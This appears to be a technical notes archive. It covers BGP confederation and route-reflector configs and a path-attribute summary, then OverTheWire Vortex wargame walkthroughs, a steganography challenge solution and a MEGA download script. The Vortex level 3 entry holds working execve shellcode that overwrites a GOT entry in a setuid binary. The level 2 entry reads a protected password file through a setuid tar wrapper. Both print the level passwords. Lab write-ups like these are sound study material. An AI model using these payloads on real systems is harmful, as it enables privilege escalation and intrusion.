 bgp confederation peers 65001
 neighbor 1.1.1.1 remote-as 65001
 neighbor 1.1.1.1 ebgp-multihop 2
 neighbor 1.1.1.1 update-source loopback1
 neighbor 3.3.3.3 remote-as 65023
 neighbor 3.3.3.3 ebgp-multihop 2
 neighbor 3.3.3.3 update-source loopback1
router bgp 65023
 no synchronization
 bgp log-neighbor-changes
 bgp confederation identifier 123
 neighbor 2.2.2.2 remote-as 65023
 neighbor 2.2.2.2 ebgp-multihop 2
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 ebgp-multihop 2
 neighbor 4.4.4.4 update-source loopback1

Route Reflectors

Some routers are configured as RR servers, some as clients and some others as non-clients (normal iBGP or eBGP neighbors).
A RR cluster contains one or more RR servers and one or more clients.
Clients only peer with the RR servers in a cluster.
RR servers peer with clients and non-clients.

To prevent loops, the RR feature uses:

- CLUSTER_LIST: RR servers add their cluster ID to the CLUSTER_LIST PA before sending an update. When receiving an update, RR servers discard received prefixes in which their cluster ID already appears.
- ORIGINATOR_ID: This PA lists the RID of the first iBGP peer to advertise the route into the AS. If a router sees its own RID in the ORIGINATOR_ID, it does not use or propagate the route.
- Only advertise the best routes: RR servers reflect routes only if the routes are the best ones in its own BGP table.

router bgp 123
 no synchronization
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source loopback1
 neighbor 2.2.2.2 next-hop-self
 neighbor 4.4.4.4 remote-as 45
 neighbor 4.4.4.4 ebgp-multihop 255
 neighbor 4.4.4.4 update-source loopback1
router bgp 123
 no synchronization
 bgp cluster-id 1 ! 0.0.0.1
 neighbor 3.3.3.3 remote-as 123
 neighbor 3.3.3.3 update-source loopback1
 neighbor 3.3.3.3 route-reflector-client
 neighbor 9.9.9.9 remote-as 123
 neighbor 9.9.9.9 update-source loopback1
router bgp 123
 no synchronization
 bgp router-id 9.9.9.9
 bgp cluster-id 2 ! 0.0.0.2
 neighbor 1.1.1.1 remote-as 123
 neighbor 1.1.1.1 update-source loopback1
 neighbor 1.1.1.1 route-reflector-client
 neighbor 2.2.2.2 remote-as 123
 neighbor 2.2.2.2 update-source loopback1
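
The route-reflector loop prevention described above (CLUSTER_LIST and ORIGINATOR_ID, only the best route reflected), applied to the RR with cluster-id 2 from the configuration, as an added Python example that is not part of the original notes. Class and function names are assumptions; the reflection targets (a route from a client goes to the other clients and to non-clients, a route from a non-client only to clients, eBGP-learned routes to all iBGP peers without RR attributes) are the standard RR behaviour the notes assume rather than something they spell out.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Added example, not from the original notes: the two RR loop checks
# (CLUSTER_LIST and ORIGINATOR_ID) and the reflection rules, for the RR
# with RID 9.9.9.9 / cluster-id 2 configured above. Names are assumptions;
# peers are identified by their loopback addresses as in the notes.


@dataclass
class Update:
    nlri: str
    originator_id: Optional[str] = None
    cluster_list: List[str] = field(default_factory=list)


@dataclass
class Reflector:
    router_id: str
    cluster_id: str
    clients: Set[str]
    nonclients: Set[str]      # ordinary iBGP peers


def accept_update(rr, upd):
    """Loop checks on a received iBGP update. Returns (accepted, reason)."""
    if upd.originator_id == rr.router_id:
        return False, "own RID in ORIGINATOR_ID"
    if rr.cluster_id in upd.cluster_list:
        return False, "own cluster ID in CLUSTER_LIST"
    return True, "ok"


def reflect(rr, upd, from_peer, from_rid, from_kind, is_best=True):
    """Updates the RR sends for a route learned from from_peer (whose RID
    is from_rid). from_kind is 'client', 'nonclient' or 'ebgp'. Returns
    {peer: Update}; only the best route in the RR's own table is sent."""
    if not is_best:
        return {}
    if from_kind == "ebgp":
        # Advertised, not reflected: no ORIGINATOR_ID or CLUSTER_LIST added.
        return {p: upd for p in rr.clients | rr.nonclients}
    if from_kind == "client":
        targets = (rr.clients | rr.nonclients) - {from_peer}
    else:
        targets = set(rr.clients) - {from_peer}
    reflected = Update(
        nlri=upd.nlri,
        # RID of the first iBGP advertiser into the AS; kept once set
        originator_id=upd.originator_id or from_rid,
        # own cluster ID goes in front of whatever is already there
        cluster_list=[rr.cluster_id] + upd.cluster_list,
    )
    return {p: reflected for p in targets}


# The RR from the configuration above: RID 9.9.9.9, cluster-id 2 (0.0.0.2),
# client 1.1.1.1, non-client 2.2.2.2.
RR9 = Reflector("9.9.9.9", "0.0.0.2", clients={"1.1.1.1"}, nonclients={"2.2.2.2"})

if __name__ == "__main__":
    sent = reflect(RR9, Update("11.0.0.0/8"), "1.1.1.1", "1.1.1.1", "client")
    print(sent)
    # if the reflected copy ever came back, the cluster check drops it
    print(accept_update(RR9, sent["2.2.2.2"]))
```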

Summary: BGP PAs

- AS_PATH: List ASNs through which the route has been advertised. Well known and mandatory.
- NEXT_HOP: Lists the next-hop IP to reach an NLRI. Well known and mandatory.
- AGGREGATOR: Lists the RID and ASN of the router that created a summary NLRI. Optional and transitive.
- ATOMIC_AGGREGATE: Tags a summary NLRI as being a summary. Well known and discretionary.
- ORIGIN: Value from where the route was injected into BGP: i, e or ?. Well known and mandatory.
- ORIGINATOR_ID: Used by RR servers to know the RID of the iBGP neighbor that injected the NLRI into the AS. Optional and transitive.
- CLUSTER_LIST: Used by RR servers to list the cluster IDs in order to prevent loops. Optional and nontransitive.

- Well known: the PA must be supported by any BGP implementation.
- Mandatory: the PA must appear in every BGP update.
- Discretionary: the PA may or may not appear in a BGP update.
- Optional: the PA may or may not be supported in all BGP implementations.
- Transitive: If the PA is received but not recognized, it should be passed on to the next AS.
- Nontransitive: If the PA is received but not recognized, it is not required to pass it on.

Summary: Methods to introduce entries into the BGP table

- network command: Advertises a route into BGP. Depends on the existence of the network in the routing table.
- Redistribution: Takes IGP, static or connected routes.
- Manual summarization: Requires at least one component subnet in the BGP table.
- default-information originate: Requires a default route in the routing table plus the redistribute command.
- neighbor default-originate: An optional route map filters the default route advertisement.

# Vortex wargame: Level 3


# ssh vortex3@vortex.labs.overthewire.org
vortex3@vortex.labs.overthewire.org's password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77

# Vortex wargame: Level 2


# ssh vortex2@vortex.labs.overthewire.org
vortex2@vortex.labs.overthewire.org's password:3233616e62545c7245

$ file /vortex/vortex2
/vortex/vortex2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xa2068f9ce871bdff032adefe1a15d401744c3520, not stripped
$ vortex/vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
$ cat /tmp/ownership.\$$.tar
etc/vortex_pass/vortex30000400001161300116130000000001212164101775015332 0ustar  vortex3vortex336346e635854767823

# Reto 17: Toulouse


# mkdir reto17
# cd reto17
reto17# hp=http://www.hackplayers.com/2013/05/reto-17-toulouse.html
reto17# url=`curl --silent $hp | grep mega | awk -F '"' '{print $6}'`
reto17# cat mega-dl
#!/bin/bash

url=$1
enc_file=$2.enc
out_file=$2

id=`echo $url | awk -F '!' '{print $2}'`
key=`echo $url | awk -F '!' '{print $3}' | sed -e 's/-/+/g' -e 's/_/\//g' -e 's/,//g'`
# 2> (not >) so the decoded key reaches xxd; only base64's padding warning is hidden
b64_hex_key=`echo -n $key | base64 --decode --ignore-garbage 2> /dev/null | xxd -p | tr -d '\n'`
key[0]=$(( 0x${b64_hex_key:00:16} ^ 0x${b64_hex_key:32:16} ))
key[1]=$(( 0x${b64_hex_key:16:16} ^ 0x${b64_hex_key:48:16} ))
# %016x keeps leading zeros so the key is always 32 hex digits (%x would drop them)
key=`printf "%016x" ${key[*]}`
iv="${b64_hex_key:32:16}0000000000000000"
new_url=`curl --silent --request POST --data-binary '[{"a":"g","g":1,"p":"'$id'"}]' https://eu.api.mega.co.nz/cs | awk -F '"' '{print $10}'`
curl --output $enc_file $new_url
openssl enc -d -aes-128-ctr -K $key -iv $iv -in $enc_file -out $out_file
rm -f $enc_file
reto17# ./mega-dl $url stego.mp4
reto17# tc=truecrypt-7.1a-linux-console-x64.tar.gz
reto17# curl --output $tc http://www.truecrypt.org/download/$tc
reto17# tar xvzf $tc
reto17# ./truecrypt-7.1a-setup-console-x64
reto17# mkdir volume
reto17# truecrypt --non-interactive --password=TOULOUSE stego.mp4 volume
reto17# head volume/CABLE_245612.txt
UNCLAS SECTION 01 OF 04 MADRID 000086

SENSITIVE
SIPDIS

STATE FOR EUR/WE, EEB/TPP/IPE, EEB/IFD/OIA, EEB/TRA/AN
STATE PASS USTR FOR D.WEINER
COMMERCE FOR 4212/DON CALVERT
ENERGY FOR PIA/K.BALLOU AND EERE/D.BIRNS
TREASURY FOR OIA/OEE/R.JOHNSTON AND OTP/M.CORWIN
References

- http://keyj.emphy.de/real-steganography-with-truecrypt/
- http://www.steganosaur.us/lecture

# Download MEGA files from command-line


# cat mega-dl
#!/bin/bash

url=$1
enc_file=$2.enc
out_file=$2

id=`echo $url | awk -F '!' '{print $2}'`
key=`echo $url | awk -F '!' '{print $3}' | sed -e 's/-/+/g' -e 's/_/\//g' -e 's/,//g'`
b64_hex_key=`echo -n $key | base64 --decode --ignore-garbage 2> /dev/null | xxd -p | tr -d '\n'`
key[0]=$(( 0x${b64_hex_key:00:16} ^ 0x${b64_hex_key:32:16} ))
key[1]=$(( 0x${b64_hex_key:16:16} ^ 0x${b64_hex_key:48:16} ))
# %016x keeps leading zeros so the key is always 32 hex digits (%x would drop them)
key=`printf "%016x" ${key[*]}`
iv="${b64_hex_key:32:16}0000000000000000"
new_url=`curl --silent --request POST --data-binary '[{"a":"g","g":1,"p":"'$id'"}]' https://eu.api.mega.co.nz/cs | awk -F '"' '{print $10}'`
curl --output $enc_file $new_url
openssl enc -d -aes-128-ctr -K $key -iv $iv -in $enc_file -out $out_file
rm -f $enc_file
# url='https://mega.co.nz/#!HFsiWYrJ!VkovRDl9kJkIMDBkiRlw-E9OGOkcD1DbNqs3d-CGNf8'
# ./mega-dl $url toulouse.mp4
# file toulouse.mp4
toulouse.mp4: ISO Media, MPEG v4 system, version 2
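
The key-unpacking step that mega-dl does with awk, xxd and bash arithmetic, rewritten in Python as an added example that is not part of the original post and run on a constructed 32-byte key rather than a real MEGA link. Function names are assumptions; the layout (four 64-bit words, AES key = k0^k2 || k1^k3, CTR IV = k2 plus eight zero bytes) is exactly what the script's substring offsets implement.

```python
import base64

# Added example (not from the original post): the key unpacking of the
# mega-dl script in Python, on a constructed key. The file link carries a
# base64url key of 32 bytes = four 64-bit words k0..k3: the AES-128 key
# is k0^k2 followed by k1^k3 (the script's :00:16 ^ :32:16 and
# :16:16 ^ :48:16), and the AES-CTR IV is k2 followed by eight zero
# bytes (the script's ${b64_hex_key:32:16} plus 16 zero hex digits).


def decode_url_key(b64url):
    """Undo the URL-safe alphabet and the missing '=' padding."""
    std = b64url.replace("-", "+").replace("_", "/").replace(",", "")
    std += "=" * (-len(std) % 4)
    raw = base64.b64decode(std)
    if len(raw) != 32:
        raise ValueError(f"expected a 32-byte file key, got {len(raw)} bytes")
    return raw


def unpack_file_key(raw):
    """Return (aes_key, iv) as bytes. Unlike printf '%x' in the script,
    leading zero bytes of the key are preserved here."""
    k0, k1, k2, k3 = (raw[i:i + 8] for i in range(0, 32, 8))
    aes_key = (bytes(a ^ b for a, b in zip(k0, k2)) +
               bytes(a ^ b for a, b in zip(k1, k3)))
    iv = k2 + bytes(8)          # 8-byte nonce, counter starts at zero
    return aes_key, iv


def key_and_iv_hex(b64url):
    """The -K and -iv arguments the script hands to openssl enc."""
    aes_key, iv = unpack_file_key(decode_url_key(b64url))
    return aes_key.hex(), iv.hex()


# Constructed key: the bytes 0x00..0x1f, base64url encoded without padding.
SAMPLE_KEY = "AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8"

if __name__ == "__main__":
    print(key_and_iv_hex(SAMPLE_KEY))
```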